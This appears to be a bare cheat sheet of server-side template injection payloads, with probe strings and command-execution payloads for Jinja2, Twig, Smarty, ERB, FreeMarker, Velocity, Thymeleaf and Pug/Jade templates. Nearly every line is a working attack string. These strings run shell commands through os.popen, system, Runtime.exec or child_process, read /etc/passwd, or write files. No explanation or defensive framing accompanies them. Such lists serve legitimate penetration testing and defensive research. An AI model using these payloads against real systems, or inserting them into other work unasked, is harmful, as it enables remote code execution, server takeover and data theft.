Server-Side Template Injection exploitation techniques
Test for SSTI vulnerability across different engines
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Python Jinja2 template exploitation
PythonFlask{{config}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{%endfor%}
PHP Twig template exploitation
PHPSymfony{{7*7}}
{{_self.env.display("hello")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
PHP Smarty template exploitation
PHP{system('whoami')}
{php}echo `whoami`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}
Ruby ERB template exploitation
RubyRails<%= 7*7 %>
<%= system("whoami") %>
<%= `whoami` %>
<%= File.open('/etc/passwd').read %>
Java FreeMarker template exploitation
Java${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }
${"freemarker.template.utility.Execute"?new()("id")}
Apache Velocity template exploitation
Java#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
Spring Thymeleaf template exploitation
JavaSpring${7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("whoami").getInputStream()).next()}__::.x
Node.js Pug/Jade template exploitation
Node.js#{7*7}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}